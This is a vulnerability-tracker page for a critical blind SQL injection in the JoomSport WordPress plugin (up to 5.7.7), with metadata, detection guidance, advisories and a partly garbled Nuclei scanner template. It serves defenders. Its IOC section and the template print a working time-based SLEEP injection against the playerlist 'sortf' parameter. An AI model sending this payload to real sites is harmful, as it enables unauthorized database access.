CVE-2026-42647
published 2026-06-11CVE-2026-42647: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue…
PriorityP277critical9.3CVSS 3.1
AVNACLPRNUINSCCHINAL
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.32%
67.3th percentile
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection.
This issue affects JoomSport: from n/a through 5.7.7.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beardev | joomsport | n/a – 5.7.7 | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC
commandpost_title`,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)#
- →Detect time-based blind SQLi attempts against JoomSport's playerlist endpoint by monitoring for requests to paths matching the season/playerlist pattern with a `sortf` parameter containing SQL comment sequences (/**/) and SLEEP() calls.
- →Flag HTTP requests where the `sortf` query parameter contains a backtick character (%60) followed by SQL injection payloads using inline comment obfuscation (/**/) — a hallmark of this exploit.
- →A successful exploitation attempt results in a response time >= 6 seconds with HTTP 200 and a body containing the strings 'Name', 'Match played', and 'Played minutes' — use response-time anomaly detection on this endpoint.
- →The initial reconnaissance step queries the playerlist endpoint with legitimate parameters (action=playerlist&sortf=post_title&sortd=ASC); monitor for this pattern as a precursor to the injection attempt.
- ·The exploit is a multi-step attack: the first stage discovers the season path dynamically from the JoomSport page body before constructing the injection URL. Detection rules must account for the path being variable/unknown in advance.
- ·The SQL injection payload uses comment-based whitespace obfuscation (/**/) to bypass naive WAF/IDS keyword matching on spaces; signatures must account for this encoding.
- ·The time-based detection threshold is set at 6 seconds (SLEEP(6)); a network timeout of 20 seconds is configured for the exploit request, so detection based solely on response time may produce false negatives in high-latency environments.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection.
ghsa_unreviewed·2026-06-12
CVE-2026-42647 [CRITICAL] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection.
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection.
This issue affects JoomSport: from n/a through 5.7.7.
VulnCheck
Vulnerability
vulncheck·2026
CVE-2026-42647 Vulnerability
WordPress Plugin: joomsport-sports-league-results-management: CVE-2026-42647: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/plugin/joomsport-sports-league-results-management/vulnerability/wordpress-joomsport-plugin-5-7-7-sql-injection-vulnerability
No detection rules found.
Nuclei
JoomSport <= 5.7.7 - SQL Injection
nuclei·CVSS 9.3
CVE-2026-42647 JoomSport <= 5.7.7 - SQL Injection
JoomSport ")'
condition: and
internal: true
extractors:
- type: regex
name: season_path
part: body
group: 1
regex:
- '[^'
internal: true
- raw:
- |
GET {{season_path}}?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Name", "Match played", "Played minutes")'
condition: and
internal: true
- raw:
- |
@timeout: 20s
GET {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'status_code == 200'
- 'contains_all(body, "Name", "Match played", "Played minutes")'
condition: and
# digest: 4b0a004830460221008d3867aa562b040ffd2a8ba0ab0557b981ef5e44f
No writeups or analysis indexed.
2026-06-11
Published
Exploited in the wild